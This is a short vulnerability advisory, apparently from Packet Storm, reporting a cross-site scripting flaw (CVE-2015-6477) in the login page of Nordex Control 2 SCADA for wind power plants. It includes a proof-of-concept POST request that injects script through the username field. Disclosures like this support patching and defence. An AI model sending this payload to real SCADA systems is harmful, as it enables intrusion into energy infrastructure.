Nordex Control 2 (NC2) SCADA 16 Cross Site Scripting

2015-12-24T00:00:00
ID PACKETSTORM:135068
Type packetstorm
Reporter Karn Ganeshen
Modified 2015-12-24T00:00:00

Description

                                        
                                            `*Nordex NC2 XSS Vulnerability*  
  
*AFFECTED PRODUCTS*  
Nordex Control 2 (NC2) SCADA V16 and prior versions.  
  
Nordex is a company based in Germany that maintains offices in countries  
around the world.  
  
The affected product, Nordex Control 2, is a web-based SCADA system for  
wind power plants. According to Nordex, NC2 is deployed across the Energy  
sector. Nordex estimates that this product is used primarily in the United  
States, Europe, and China.  
  
  
*CVE-ID*  
CVE-2015-6477  
  
*Reference*  
https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01  
  
*Vulnerable parameter*  
username  
  
*PoC*  
  
POST /login HTTP/1.1  
  
connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en  
  
--   
Best Regards,  
Karn Ganeshen  
  
  
`